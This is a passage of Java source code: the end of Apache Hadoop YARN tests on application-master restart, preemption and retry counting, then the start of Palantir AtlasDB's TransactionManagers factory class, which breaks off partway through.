while (schedulerAttempt.getReservedContainers().isEmpty()) {
System.out.println("Waiting for container " + containerId6
+ " to be reserved.");
nm1.nodeHeartbeat(true);
Thread.sleep(200);
}
// assert containerId6 is reserved.
Assert.assertEquals(containerId6, schedulerAttempt.getReservedContainers()
.get(0).getContainerId());
// fail the AM by sending CONTAINER_FINISHED event without registering.
nm1.nodeHeartbeat(am1.getApplicationAttemptId(), 1, ContainerState.COMPLETE);
am1.waitForState(RMAppAttemptState.FAILED);
// wait for some time. previous AM's running containers should still remain
// in scheduler even though am failed
Thread.sleep(3000);
rm1.waitForState(nm1, containerId2, RMContainerState.RUNNING);
// acquired/allocated containers are cleaned up.
Assert.assertNull(rm1.getResourceScheduler().getRMContainer(containerId4));
Assert.assertNull(rm1.getResourceScheduler().getRMContainer(containerId5));
// wait for app to start a new attempt.
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
// assert this is a new AM.
ApplicationAttemptId newAttemptId =
app1.getCurrentAppAttempt().getAppAttemptId();
Assert.assertFalse(newAttemptId.equals(am1.getApplicationAttemptId()));
// launch the new AM
RMAppAttempt attempt2 = app1.getCurrentAppAttempt();
nm1.nodeHeartbeat(true);
MockAM am2 = rm1.sendAMLaunched(attempt2.getAppAttemptId());
RegisterApplicationMasterResponse registerResponse =
am2.registerAppAttempt();
// Assert two containers are running: container2 and container3;
Assert.assertEquals(2, registerResponse.getContainersFromPreviousAttempts()
.size());
boolean containerId2Exists = false, containerId3Exists = false;
for (Container container : registerResponse
.getContainersFromPreviousAttempts()) {
if (container.getId().equals(containerId2)) {
containerId2Exists = true;
}
if (container.getId().equals(containerId3)) {
containerId3Exists = true;
}
}
Assert.assertTrue(containerId2Exists && containerId3Exists);
rm1.waitForState(app1.getApplicationId(), RMAppState.RUNNING);
// complete container by sending the container complete event which has earlier
// attempt's attemptId
nm1.nodeHeartbeat(am1.getApplicationAttemptId(), 3, ContainerState.COMPLETE);
// Even though the completed container containerId3 event was sent to the
// earlier failed attempt, new RMAppAttempt can also capture this container
// info.
// completed containerId4 is also transferred to the new attempt.
RMAppAttempt newAttempt =
app1.getRMAppAttempt(am2.getApplicationAttemptId());
// 4 containers finished, acquired/allocated/reserved/completed.
waitForContainersToFinish(4, newAttempt);
boolean container3Exists = false, container4Exists = false, container5Exists =
false, container6Exists = false;
for(ContainerStatus status : newAttempt.getJustFinishedContainers()) {
if(status.getContainerId().equals(containerId3)) {
// containerId3 is the container ran by previous attempt but finished by the
// new attempt.
container3Exists = true;
}
if (status.getContainerId().equals(containerId4)) {
// containerId4 is the Acquired Container killed by the previous attempt,
// it's now inside new attempt's finished container list.
container4Exists = true;
}
if (status.getContainerId().equals(containerId5)) {
// containerId5 is the Allocated container killed by previous failed attempt.
container5Exists = true;
}
if (status.getContainerId().equals(containerId6)) {
// containerId6 is the reserved container killed by previous failed attempt.
container6Exists = true;
}
}
Assert.assertTrue(container3Exists && container4Exists && container5Exists
&& container6Exists);
// New SchedulerApplicationAttempt also has the containers info.
rm1.waitForState(nm1, containerId2, RMContainerState.RUNNING);
// record the scheduler attempt for testing.
SchedulerApplicationAttempt schedulerNewAttempt =
((AbstractYarnScheduler) rm1.getResourceScheduler())
.getCurrentAttemptForContainer(containerId2);
// finish this application
MockRM.finishAMAndVerifyAppState(app1, rm1, nm1, am2);
// the 2nd attempt released the 1st attempt's running container, when the
// 2nd attempt finishes.
Assert.assertFalse(schedulerNewAttempt.getLiveContainers().contains(
containerId2));
// all 4 normal containers finished.
System.out.println("New attempt's just finished containers: "
+ newAttempt.getJustFinishedContainers());
waitForContainersToFinish(5, newAttempt);
rm1.stop();
}
private void waitForContainersToFinish(int expectedNum, RMAppAttempt attempt)
throws InterruptedException {
int count = 0;
while (attempt.getJustFinishedContainers().size() != expectedNum
&& count < 500) {
Thread.sleep(100);
count++;
}
}
@Test(timeout = 30000)
public void testNMTokensRebindOnAMRestart() throws Exception {
YarnConfiguration conf = new YarnConfiguration();
conf.setInt(YarnConfiguration.RM_AM_MAX_ATTEMPTS, 3);
MockRM rm1 = new MockRM(conf);
rm1.start();
RMApp app1 =
rm1.submitApp(200, "myname", "myuser",
new HashMap<ApplicationAccessType, String>(), false, "default", -1,
null, "MAPREDUCE", false, true);
MockNM nm1 =
new MockNM("127.0.0.1:1234", 8000, rm1.getResourceTrackerService());
nm1.registerNode();
MockNM nm2 =
new MockNM("127.1.1.1:4321", 8000, rm1.getResourceTrackerService());
nm2.registerNode();
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
List<Container> containers = new ArrayList<Container>();
// nmTokens keeps track of all the nmTokens issued in the allocate call.
List<NMToken> expectedNMTokens = new ArrayList<NMToken>();
// am1 allocate 2 container on nm1.
// first container
while (true) {
AllocateResponse response =
am1.allocate("127.0.0.1", 2000, 2,
new ArrayList<ContainerId>());
nm1.nodeHeartbeat(true);
containers.addAll(response.getAllocatedContainers());
expectedNMTokens.addAll(response.getNMTokens());
if (containers.size() == 2) {
break;
}
Thread.sleep(200);
System.out.println("Waiting for container to be allocated.");
}
// launch the container-2
nm1.nodeHeartbeat(am1.getApplicationAttemptId(), 2, ContainerState.RUNNING);
ContainerId containerId2 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 2);
rm1.waitForState(nm1, containerId2, RMContainerState.RUNNING);
// launch the container-3
nm1.nodeHeartbeat(am1.getApplicationAttemptId(), 3, ContainerState.RUNNING);
ContainerId containerId3 =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 3);
rm1.waitForState(nm1, containerId3, RMContainerState.RUNNING);
// fail am1
nm1.nodeHeartbeat(am1.getApplicationAttemptId(), 1, ContainerState.COMPLETE);
am1.waitForState(RMAppAttemptState.FAILED);
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
// restart the am
MockAM am2 = MockRM.launchAM(app1, rm1, nm1);
RegisterApplicationMasterResponse registerResponse =
am2.registerAppAttempt();
rm1.waitForState(app1.getApplicationId(), RMAppState.RUNNING);
// check am2 get the nm token from am1.
Assert.assertEquals(expectedNMTokens,
registerResponse.getNMTokensFromPreviousAttempts());
// am2 allocate 1 container on nm2
containers = new ArrayList<Container>();
while (true) {
AllocateResponse allocateResponse =
am2.allocate("127.1.1.1", 4000, 1,
new ArrayList<ContainerId>());
nm2.nodeHeartbeat(true);
containers.addAll(allocateResponse.getAllocatedContainers());
expectedNMTokens.addAll(allocateResponse.getNMTokens());
if (containers.size() == 1) {
break;
}
Thread.sleep(200);
System.out.println("Waiting for container to be allocated.");
}
nm1.nodeHeartbeat(am2.getApplicationAttemptId(), 2, ContainerState.RUNNING);
ContainerId am2ContainerId2 =
ContainerId.newContainerId(am2.getApplicationAttemptId(), 2);
rm1.waitForState(nm1, am2ContainerId2, RMContainerState.RUNNING);
// fail am2.
nm1.nodeHeartbeat(am2.getApplicationAttemptId(), 1, ContainerState.COMPLETE);
am2.waitForState(RMAppAttemptState.FAILED);
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
// restart am
MockAM am3 = MockRM.launchAM(app1, rm1, nm1);
registerResponse = am3.registerAppAttempt();
rm1.waitForState(app1.getApplicationId(), RMAppState.RUNNING);
// check am3 get the NM token from both am1 and am2;
List<NMToken> transferredTokens = registerResponse.getNMTokensFromPreviousAttempts();
Assert.assertEquals(2, transferredTokens.size());
Assert.assertTrue(transferredTokens.containsAll(expectedNMTokens));
rm1.stop();
}
// AM container preempted, nm disk failure
// should not be counted towards AM max retry count.
@Test(timeout = 100000)
public void testShouldNotCountFailureToMaxAttemptRetry() throws Exception {
YarnConfiguration conf = new YarnConfiguration();
conf.setClass(YarnConfiguration.RM_SCHEDULER, CapacityScheduler.class,
ResourceScheduler.class);
// explicitly set max-am-retry count as 1.
conf.setInt(YarnConfiguration.RM_AM_MAX_ATTEMPTS, 1);
conf.setBoolean(YarnConfiguration.RECOVERY_ENABLED, true);
conf.set(YarnConfiguration.RM_STORE, MemoryRMStateStore.class.getName());
MemoryRMStateStore memStore = new MemoryRMStateStore();
memStore.init(conf);
MockRM rm1 = new MockRM(conf, memStore);
rm1.start();
MockNM nm1 =
new MockNM("127.0.0.1:1234", 8000, rm1.getResourceTrackerService());
nm1.registerNode();
RMApp app1 = rm1.submitApp(200);
RMAppAttempt attempt1 = app1.getCurrentAppAttempt();
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
CapacityScheduler scheduler =
(CapacityScheduler) rm1.getResourceScheduler();
ContainerId amContainer =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
// Preempt the first attempt;
scheduler.killContainer(scheduler.getRMContainer(amContainer));
am1.waitForState(RMAppAttemptState.FAILED);
Assert.assertTrue(! attempt1.shouldCountTowardsMaxAttemptRetry());
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
ApplicationStateData appState =
memStore.getState().getApplicationState().get(app1.getApplicationId());
// AM should be restarted even though max-am-attempt is 1.
MockAM am2 =
rm1.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 2, nm1);
RMAppAttempt attempt2 = app1.getCurrentAppAttempt();
Assert.assertTrue(((RMAppAttemptImpl) attempt2).mayBeLastAttempt());
// Preempt the second attempt.
ContainerId amContainer2 =
ContainerId.newContainerId(am2.getApplicationAttemptId(), 1);
scheduler.killContainer(scheduler.getRMContainer(amContainer2));
am2.waitForState(RMAppAttemptState.FAILED);
Assert.assertTrue(! attempt2.shouldCountTowardsMaxAttemptRetry());
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
MockAM am3 =
rm1.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 3, nm1);
RMAppAttempt attempt3 = app1.getCurrentAppAttempt();
Assert.assertTrue(((RMAppAttemptImpl) attempt3).mayBeLastAttempt());
// mimic NM disk_failure
ContainerStatus containerStatus = Records.newRecord(ContainerStatus.class);
containerStatus.setContainerId(attempt3.getMasterContainer().getId());
containerStatus.setDiagnostics("mimic NM disk_failure");
containerStatus.setState(ContainerState.COMPLETE);
containerStatus.setExitStatus(ContainerExitStatus.DISKS_FAILED);
Map<ApplicationId, List<ContainerStatus>> conts =
new HashMap<ApplicationId, List<ContainerStatus>>();
conts.put(app1.getApplicationId(),
Collections.singletonList(containerStatus));
nm1.nodeHeartbeat(conts, true);
am3.waitForState(RMAppAttemptState.FAILED);
Assert.assertTrue(! attempt3.shouldCountTowardsMaxAttemptRetry());
Assert.assertEquals(ContainerExitStatus.DISKS_FAILED,
appState.getAttempt(am3.getApplicationAttemptId())
.getAMContainerExitStatus());
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
MockAM am4 =
rm1.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 4, nm1);
RMAppAttempt attempt4 = app1.getCurrentAppAttempt();
Assert.assertTrue(((RMAppAttemptImpl) attempt4).mayBeLastAttempt());
// create second NM, and register to rm1
MockNM nm2 =
new MockNM("127.0.0.1:2234", 8000, rm1.getResourceTrackerService());
nm2.registerNode();
// nm1 heartbeats to report unhealthy
// This will mimic ContainerExitStatus.ABORT
nm1.nodeHeartbeat(false);
am4.waitForState(RMAppAttemptState.FAILED);
Assert.assertTrue(! attempt4.shouldCountTowardsMaxAttemptRetry());
Assert.assertEquals(ContainerExitStatus.ABORTED,
appState.getAttempt(am4.getApplicationAttemptId())
.getAMContainerExitStatus());
// launch next AM in nm2
nm2.nodeHeartbeat(true);
MockAM am5 =
rm1.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 5, nm2);
RMAppAttempt attempt5 = app1.getCurrentAppAttempt();
Assert.assertTrue(((RMAppAttemptImpl) attempt5).mayBeLastAttempt());
// fail the AM normally
nm2
.nodeHeartbeat(am5.getApplicationAttemptId(), 1, ContainerState.COMPLETE);
am5.waitForState(RMAppAttemptState.FAILED);
Assert.assertTrue(attempt5.shouldCountTowardsMaxAttemptRetry());
// AM should not be restarted.
rm1.waitForState(app1.getApplicationId(), RMAppState.FAILED);
Assert.assertEquals(5, app1.getAppAttempts().size());
rm1.stop();
}
// Test RM restarts after AM container is preempted, new RM should not count
// AM preemption failure towards the max-retry-account and should be able to
// re-launch the AM.
@Test(timeout = 20000)
public void testPreemptedAMRestartOnRMRestart() throws Exception {
YarnConfiguration conf = new YarnConfiguration();
conf.setClass(YarnConfiguration.RM_SCHEDULER, CapacityScheduler.class,
ResourceScheduler.class);
conf.setBoolean(YarnConfiguration.RECOVERY_ENABLED, true);
conf.set(YarnConfiguration.RM_STORE, MemoryRMStateStore.class.getName());
// explicitly set max-am-retry count as 1.
conf.setInt(YarnConfiguration.RM_AM_MAX_ATTEMPTS, 1);
MemoryRMStateStore memStore = new MemoryRMStateStore();
memStore.init(conf);
MockRM rm1 = new MockRM(conf, memStore);
rm1.start();
MockNM nm1 =
new MockNM("127.0.0.1:1234", 8000, rm1.getResourceTrackerService());
nm1.registerNode();
RMApp app1 = rm1.submitApp(200);
RMAppAttempt attempt1 = app1.getCurrentAppAttempt();
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
CapacityScheduler scheduler =
(CapacityScheduler) rm1.getResourceScheduler();
ContainerId amContainer =
ContainerId.newContainerId(am1.getApplicationAttemptId(), 1);
// Forcibly preempt the am container;
scheduler.killContainer(scheduler.getRMContainer(amContainer));
am1.waitForState(RMAppAttemptState.FAILED);
Assert.assertTrue(! attempt1.shouldCountTowardsMaxAttemptRetry());
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
// state store has 1 attempt stored.
ApplicationStateData appState =
memStore.getState().getApplicationState().get(app1.getApplicationId());
Assert.assertEquals(1, appState.getAttemptCount());
// attempt stored has the preempted container exit status.
Assert.assertEquals(ContainerExitStatus.PREEMPTED,
appState.getAttempt(am1.getApplicationAttemptId())
.getAMContainerExitStatus());
// Restart rm.
MockRM rm2 = new MockRM(conf, memStore);
nm1.setResourceTrackerService(rm2.getResourceTrackerService());
nm1.registerNode();
rm2.start();
// Restarted RM should re-launch the am.
MockAM am2 =
rm2.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 2, nm1);
MockRM.finishAMAndVerifyAppState(app1, rm2, nm1, am2);
RMAppAttempt attempt2 =
rm2.getRMContext().getRMApps().get(app1.getApplicationId())
.getCurrentAppAttempt();
Assert.assertTrue(attempt2.shouldCountTowardsMaxAttemptRetry());
Assert.assertEquals(ContainerExitStatus.INVALID,
appState.getAttempt(am2.getApplicationAttemptId())
.getAMContainerExitStatus());
rm1.stop();
rm2.stop();
}
// Test regular RM restart/failover, new RM should not count
// AM failure towards the max-retry-account and should be able to
// re-launch the AM.
@Test(timeout = 50000)
public void testRMRestartOrFailoverNotCountedForAMFailures()
throws Exception {
YarnConfiguration conf = new YarnConfiguration();
conf.setClass(YarnConfiguration.RM_SCHEDULER, CapacityScheduler.class,
ResourceScheduler.class);
conf.setBoolean(YarnConfiguration.RECOVERY_ENABLED, true);
conf.set(YarnConfiguration.RM_STORE, MemoryRMStateStore.class.getName());
// explicitly set max-am-retry count as 1.
conf.setInt(YarnConfiguration.RM_AM_MAX_ATTEMPTS, 1);
MemoryRMStateStore memStore = new MemoryRMStateStore();
memStore.init(conf);
MockRM rm1 = new MockRM(conf, memStore);
rm1.start();
MockNM nm1 =
new MockNM("127.0.0.1:1234", 8000, rm1.getResourceTrackerService());
nm1.registerNode();
RMApp app1 = rm1.submitApp(200);
// AM should be restarted even though max-am-attempt is 1.
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
RMAppAttempt attempt1 = app1.getCurrentAppAttempt();
Assert.assertTrue(((RMAppAttemptImpl) attempt1).mayBeLastAttempt());
// Restart rm.
MockRM rm2 = new MockRM(conf, memStore);
rm2.start();
ApplicationStateData appState =
memStore.getState().getApplicationState().get(app1.getApplicationId());
// re-register the NM
nm1.setResourceTrackerService(rm2.getResourceTrackerService());
NMContainerStatus status = Records.newRecord(NMContainerStatus.class);
status
.setContainerExitStatus(ContainerExitStatus.KILLED_BY_RESOURCEMANAGER);
status.setContainerId(attempt1.getMasterContainer().getId());
status.setContainerState(ContainerState.COMPLETE);
status.setDiagnostics("");
nm1.registerNode(Collections.singletonList(status), null);
rm2.waitForState(attempt1.getAppAttemptId(), RMAppAttemptState.FAILED);
Assert.assertEquals(ContainerExitStatus.KILLED_BY_RESOURCEMANAGER,
appState.getAttempt(am1.getApplicationAttemptId())
.getAMContainerExitStatus());
// Will automatically start a new AppAttempt in rm2
rm2.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
MockAM am2 =
rm2.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 2, nm1);
MockRM.finishAMAndVerifyAppState(app1, rm2, nm1, am2);
RMAppAttempt attempt3 =
rm2.getRMContext().getRMApps().get(app1.getApplicationId())
.getCurrentAppAttempt();
Assert.assertTrue(attempt3.shouldCountTowardsMaxAttemptRetry());
Assert.assertEquals(ContainerExitStatus.INVALID,
appState.getAttempt(am2.getApplicationAttemptId())
.getAMContainerExitStatus());
rm1.stop();
rm2.stop();
}
@Test (timeout = 50000)
public void testRMAppAttemptFailuresValidityInterval() throws Exception {
YarnConfiguration conf = new YarnConfiguration();
conf.setClass(YarnConfiguration.RM_SCHEDULER, CapacityScheduler.class,
ResourceScheduler.class);
conf.setBoolean(YarnConfiguration.RECOVERY_ENABLED, true);
conf.set(YarnConfiguration.RM_STORE, MemoryRMStateStore.class.getName());
// explicitly set max-am-retry count as 2.
conf.setInt(YarnConfiguration.RM_AM_MAX_ATTEMPTS, 2);
MemoryRMStateStore memStore = new MemoryRMStateStore();
memStore.init(conf);
MockRM rm1 = new MockRM(conf, memStore);
rm1.start();
MockNM nm1 =
new MockNM("127.0.0.1:1234", 8000, rm1.getResourceTrackerService());
nm1.registerNode();
// set window size to a larger number : 20s
// we will verify the app should be failed if
// two continuous attempts failed in 20s.
RMApp app = rm1.submitApp(200, 20000);
MockAM am = MockRM.launchAM(app, rm1, nm1);
// Fail current attempt normally
nm1.nodeHeartbeat(am.getApplicationAttemptId(),
1, ContainerState.COMPLETE);
am.waitForState(RMAppAttemptState.FAILED);
// launch the second attempt
rm1.waitForState(app.getApplicationId(), RMAppState.ACCEPTED);
Assert.assertEquals(2, app.getAppAttempts().size());
Assert.assertTrue(((RMAppAttemptImpl) app.getCurrentAppAttempt())
.mayBeLastAttempt());
MockAM am_2 = MockRM.launchAndRegisterAM(app, rm1, nm1);
am_2.waitForState(RMAppAttemptState.RUNNING);
nm1.nodeHeartbeat(am_2.getApplicationAttemptId(),
1, ContainerState.COMPLETE);
am_2.waitForState(RMAppAttemptState.FAILED);
// current app should be failed.
rm1.waitForState(app.getApplicationId(), RMAppState.FAILED);
ControlledClock clock = new ControlledClock(new SystemClock());
// set window size to 6s
RMAppImpl app1 = (RMAppImpl)rm1.submitApp(200, 6000);;
app1.setSystemClock(clock);
MockAM am1 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
// Fail attempt1 normally
nm1.nodeHeartbeat(am1.getApplicationAttemptId(),
1, ContainerState.COMPLETE);
am1.waitForState(RMAppAttemptState.FAILED);
// launch the second attempt
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
Assert.assertEquals(2, app1.getAppAttempts().size());
RMAppAttempt attempt2 = app1.getCurrentAppAttempt();
Assert.assertTrue(((RMAppAttemptImpl) attempt2).mayBeLastAttempt());
MockAM am2 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
am2.waitForState(RMAppAttemptState.RUNNING);
// wait for 6 seconds
clock.setTime(System.currentTimeMillis() + 6*1000);
// Fail attempt2 normally
nm1.nodeHeartbeat(am2.getApplicationAttemptId(),
1, ContainerState.COMPLETE);
am2.waitForState(RMAppAttemptState.FAILED);
// can launch the third attempt successfully
rm1.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
Assert.assertEquals(3, app1.getAppAttempts().size());
RMAppAttempt attempt3 = app1.getCurrentAppAttempt();
clock.reset();
MockAM am3 = MockRM.launchAndRegisterAM(app1, rm1, nm1);
am3.waitForState(RMAppAttemptState.RUNNING);
// Restart rm.
@SuppressWarnings("resource")
MockRM rm2 = new MockRM(conf, memStore);
rm2.start();
// re-register the NM
nm1.setResourceTrackerService(rm2.getResourceTrackerService());
NMContainerStatus status = Records.newRecord(NMContainerStatus.class);
status
.setContainerExitStatus(ContainerExitStatus.KILLED_BY_RESOURCEMANAGER);
status.setContainerId(attempt3.getMasterContainer().getId());
status.setContainerState(ContainerState.COMPLETE);
status.setDiagnostics("");
nm1.registerNode(Collections.singletonList(status), null);
rm2.waitForState(attempt3.getAppAttemptId(), RMAppAttemptState.FAILED);
rm2.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
// Lauch Attempt 4
MockAM am4 =
rm2.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 4, nm1);
// wait for 6 seconds
clock.setTime(System.currentTimeMillis() + 6*1000);
// Fail attempt4 normally
nm1
.nodeHeartbeat(am4.getApplicationAttemptId(), 1, ContainerState.COMPLETE);
am4.waitForState(RMAppAttemptState.FAILED);
// can launch the 5th attempt successfully
rm2.waitForState(app1.getApplicationId(), RMAppState.ACCEPTED);
MockAM am5 =
rm2.waitForNewAMToLaunchAndRegister(app1.getApplicationId(), 5, nm1);
clock.reset();
am5.waitForState(RMAppAttemptState.RUNNING);
// Fail attempt5 normally
nm1
.nodeHeartbeat(am5.getApplicationAttemptId(), 1, ContainerState.COMPLETE);
am5.waitForState(RMAppAttemptState.FAILED);
rm2.waitForState(app1.getApplicationId(), RMAppState.FAILED);
rm1.stop();
rm2.stop();
}
}
|
|
/**
* Copyright 2015 Palantir Technologies
*
* Licensed under the BSD-3 License (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://opensource.org/licenses/BSD-3-Clause
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.palantir.atlasdb.factory;
import java.util.ServiceLoader;
import java.util.Set;
import javax.net.ssl.SSLSocketFactory;
import org.immutables.value.Value;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import com.google.common.base.Function;
import com.google.common.base.Optional;
import com.google.common.base.Supplier;
import com.google.common.base.Suppliers;
import com.google.common.collect.ImmutableList;
import com.google.common.collect.ImmutableSet;
import com.palantir.atlasdb.cleaner.Cleaner;
import com.palantir.atlasdb.cleaner.CleanupFollower;
import com.palantir.atlasdb.cleaner.DefaultCleanerBuilder;
import com.palantir.atlasdb.cleaner.Follower;
import com.palantir.atlasdb.config.AtlasDbConfig;
import com.palantir.atlasdb.config.ServerListConfig;
import com.palantir.atlasdb.http.AtlasDbHttpClients;
import com.palantir.atlasdb.keyvalue.api.KeyValueService;
import com.palantir.atlasdb.keyvalue.impl.NamespacedKeyValueServices;
import com.palantir.atlasdb.keyvalue.impl.SweepStatsKeyValueService;
import com.palantir.atlasdb.schema.SweepSchema;
import com.palantir.atlasdb.schema.generated.SweepTableFactory;
import com.palantir.atlasdb.spi.AtlasDbFactory;
import com.palantir.atlasdb.sweep.BackgroundSweeper;
import com.palantir.atlasdb.sweep.BackgroundSweeperImpl;
import com.palantir.atlasdb.sweep.SweepTaskRunner;
import com.palantir.atlasdb.sweep.SweepTaskRunnerImpl;
import com.palantir.atlasdb.table.description.Schema;
import com.palantir.atlasdb.table.description.Schemas;
import com.palantir.atlasdb.transaction.api.AtlasDbConstraintCheckingMode;
import com.palantir.atlasdb.transaction.api.TransactionManager;
import com.palantir.atlasdb.transaction.impl.ConflictDetectionManager;
import com.palantir.atlasdb.transaction.impl.ConflictDetectionManagers;
import com.palantir.atlasdb.transaction.impl.SerializableTransactionManager;
import com.palantir.atlasdb.transaction.impl.SnapshotTransactionManager;
import com.palantir.atlasdb.transaction.impl.SweepStrategyManager;
import com.palantir.atlasdb.transaction.impl.SweepStrategyManagers;
import com.palantir.atlasdb.transaction.service.TransactionService;
import com.palantir.atlasdb.transaction.service.TransactionServices;
import com.palantir.leader.LeaderElectionService;
import com.palantir.leader.proxy.AwaitingLeadershipProxy;
import com.palantir.lock.LockClient;
import com.palantir.lock.RemoteLockService;
import com.palantir.lock.client.LockRefreshingRemoteLockService;
import com.palantir.lock.impl.LockServiceImpl;
import com.palantir.timestamp.TimestampService;
public class TransactionManagers {
private static final Logger log = LoggerFactory.getLogger(TransactionManagers.class);
private static final ServiceLoader<AtlasDbFactory> loader = ServiceLoader.load(AtlasDbFactory.class);
/**
* Create a {@link SerializableTransactionManager} with provided configuration, {@link SSLSocketFactory}, {@link Schema},
* and an environment in which to register HTTP server endpoints.
*/
public static SerializableTransactionManager create(AtlasDbConfig config,
Optional<SSLSocketFactory> sslSocketFactory,
Schema schema,
Environment env) {
return create(config, sslSocketFactory, ImmutableSet.of(schema), env);
}
/**
* Create a {@link SerializableTransactionManager} with provided configuration, {@link SSLSocketFactory}, a set of
* {@link Schema}s, and an environment in which to register HTTP server endpoints.
*/
public static SerializableTransactionManager create(AtlasDbConfig config,
Optional<SSLSocketFactory> sslSocketFactory,
Set<Schema> schemas,
Environment env) {
final AtlasDbFactory kvsFactory = getKeyValueServiceFactory(config.keyValueService().type());
final KeyValueService rawKvs = kvsFactory.createRawKeyValueService(config.keyValueService());
LockAndTimestampServices lts = createLockAndTimestampServices(config, sslSocketFactory, env,
new Supplier<RemoteLockService>() {
@Override
public RemoteLockService get() {
return LockServiceImpl.create();
}
},
new Supplier<TimestampService>() {
@Override
public TimestampService get() {
return kvsFactory.createTimestampService(rawKvs);
}
});
lts = ImmutableLockAndTimestampServices.builder()
.from(lts)
.lock(LockRefreshingRemoteLockService.create(lts.lock()))
.build();
KeyValueService kvs = NamespacedKeyValueServices.wrapWithStaticNamespaceMappingKvs(rawKvs);
kvs = new SweepStatsKeyValueService(kvs, lts.time());
SnapshotTransactionManager.createTables(kvs);
LockClient lockClient = LockClient.of("atlas instance");
TransactionService transactionService = TransactionServices.createTransactionService(kvs);
ConflictDetectionManager conflictManager = ConflictDetectionManagers.createDefault(kvs);
SweepStrategyManager sweepStrategyManager = SweepStrategyManagers.createDefault(kvs);
for (Schema schema : ImmutableSet.<Schema>builder().add(SweepSchema.INSTANCE.getLatestSchema()).addAll(schemas).build()) {
Schemas.createTablesAndIndexes(schema, kvs);
}
CleanupFollower follower = CleanupFollower.create(schemas);
Cleaner cleaner = new DefaultCleanerBuilder(
kvs,
lts.lock(),
lts.time(),
lockClient,
ImmutableList.of(follower),
transactionService)
.setBackgroundScrubAggressively(config.backgroundScrubAggressively())
.setBackgroundScrubBatchSize(config.getBackgroundScrubBatchSize())
.setBackgroundScrubFrequencyMillis(config.getBackgroundScrubFrequencyMillis())
.setBackgroundScrubThreads(config.getBackgroundScrubThreads())
.setPunchIntervalMillis(config.getPunchIntervalMillis())
.setTransactionReadTimeout(config.getTransactionReadTimeoutMillis())
.buildCleaner();
SerializableTransactionManager transactionManager = new SerializableTransactionManager(kvs,
lts.time(),
lockClient,
lts.lock(),
transactionService,
Suppliers.ofInstance(AtlasDbConstraintCheckingMode.FULL_CONSTRAINT_CHECKING_THROWS_EXCEPTIONS),
conflictManager,
sweepStrategyManager,
cleaner);
SweepTaskRunner sweepRunner = new SweepTaskRunnerImpl(
transactionManager,
kvs,
getUnreadableTsSupplier(transactionManager),
getImmutableTsSupplier(transactionManager),
transactionService,
sweepStrategyManager,
ImmutableList.<Follower>of(follower));
BackgroundSweeper backgroundSweeper = new BackgroundSweeperImpl(
transactionManager,
kvs,
sweepRunner,
Suppliers.ofInstance(config.enableSweep()),
Suppliers.ofInstance(config.getSweepPauseMillis()),
Suppliers.ofInstance(config.getSweepBatchSize()),
SweepTableFactory.of());
backgroundSweeper.runInBackground();
return transactionManager;
}
private static Supplier<Long> getImmutableTsSupplier(final TransactionManager txManager) {
return new Supplier<Long>() {
@Override
public Long get() {
return txManager.getImmutableTimestamp();
}
};
}
private static Supplier<Long> getUnreadableTsSupplier(final TransactionManager txManager) {
return new Supplier<Long>() {
@Override
public Long get() {
return txManager.getUnreadableTimestamp();
}
};
}
private static AtlasDbFactory getKeyValueServiceFactory(String type) {
for (AtlasDbFactory factory : loader) {
if (factory.getType().equalsIgnoreCase(type)) {
return factory;
}
}
throw new IllegalStateException("No atlas provider for KeyValueService type " + type + " is on your classpath.");
}
private static LockAndTimestampServices createLockAndTimestampServices(
AtlasDbConfig config,
Optional<SSLSocketFactory> sslSocketFactory,
Environment env,
Supplier<RemoteLockService> lock,
Supplier<TimestampService> time) {
if (config.leader().isPresent()) {
LeaderElectionService leader = Leaders.create(sslSocketFactory, env, config.leader().get());
env.register(AwaitingLeadershipProxy.newProxyInstance(RemoteLockService.class, lock, leader));
env.register(AwaitingLeadershipProxy.newProxyInstance(TimestampService.class, time, leader));
warnIf(config.lock().isPresent(), "Ignoring lock server configuration because leadership election is enabled");
warnIf(config.timestamp().isPresent(), "Ignoring timestamp server configuration because leadership election is enabled");
return ImmutableLockAndTimestampServices.builder()
.lock(createService(sslSocketFactory, config.leader().get().leaders(), RemoteLockService.class))
.time(createService(sslSocketFactory, config.leader().get().leaders(), TimestampService.class))
.build();
} else {
warnIf(config.lock().isPresent() != config.timestamp().isPresent(), "Using embedded instances for one (but not both) of lock and timestamp services");
return ImmutableLockAndTimestampServices.builder()
.lock(config.lock().transform(new ServiceCreator<>(sslSocketFactory, RemoteLockService.class)).or(lock))
.time(config.timestamp().transform(new ServiceCreator<>(sslSocketFactory, TimestampService.class)).or(time))
.build();
}
}
private static void warnIf(boolean arg, String warning) {
if (arg) {
log.warn(warning);
}
}
